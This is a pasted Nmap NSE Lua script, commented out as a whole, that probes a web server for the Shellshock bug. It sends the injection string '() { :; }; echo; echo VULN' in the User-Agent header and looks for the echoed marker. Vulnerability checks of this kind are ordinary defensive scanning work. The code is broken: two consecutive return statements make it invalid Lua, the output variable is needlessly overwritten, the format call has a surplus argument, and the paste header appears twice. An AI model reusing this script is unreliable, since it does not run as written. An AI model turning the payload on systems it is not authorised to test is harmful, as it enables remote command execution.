20 lines
707 B
Plaintext
20 lines
707 B
Plaintext
/*local http = require "http"
|
|
local stdnse = require "stdnse"
|
|
local shortport = require "shortport"
|
|
local output = stdnse.output_table()
|
|
|
|
local function check(host, port, url)
|
|
local payload = "() { :; }; echo; echo VULN"
|
|
local response = http.get(host, port, url, { ["header"] = { ["User-Agent"] = payload } })
|
|
output = response
|
|
return output
|
|
return response and response.body and response.body:find("VULN")
|
|
end
|
|
|
|
portrule = shortport.http
|
|
|
|
action = function(host, port)
|
|
local url = stdnse.get_script_args("url")
|
|
local vulnerable = check(host, port, url)
|
|
return string.format("Host %s:%s/%s is %s vulnerable to Shellshock", host.ip, port.number, url, vulnerable and "" or " NOT", url)
|
|
end */ |